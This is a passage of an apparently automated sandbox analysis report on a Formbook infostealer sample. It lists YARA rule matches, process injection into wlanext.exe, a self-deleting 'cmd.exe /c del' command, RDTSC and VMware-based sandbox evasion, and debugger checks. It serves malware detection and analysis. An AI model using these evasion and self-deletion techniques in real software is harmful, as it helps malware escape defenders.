          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsz26A1.tmpJump to behavior
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Unpacked PE file: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004161E9 push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041624E push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00418F45 push es; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004161E9 push es; retf
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_0041624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0385D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010461E9 push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010460CD push 00000033h; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104C381 pushad ; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104624E push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104B402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104B40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104B46C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01048F45 push es; ret
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | File created: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 00000000010385E4 second address: 00000000010385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 000000000103897E second address: 0000000001038984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 7036 | Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5012 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.669248247.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.665465411.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.673364825.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_6FD710A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
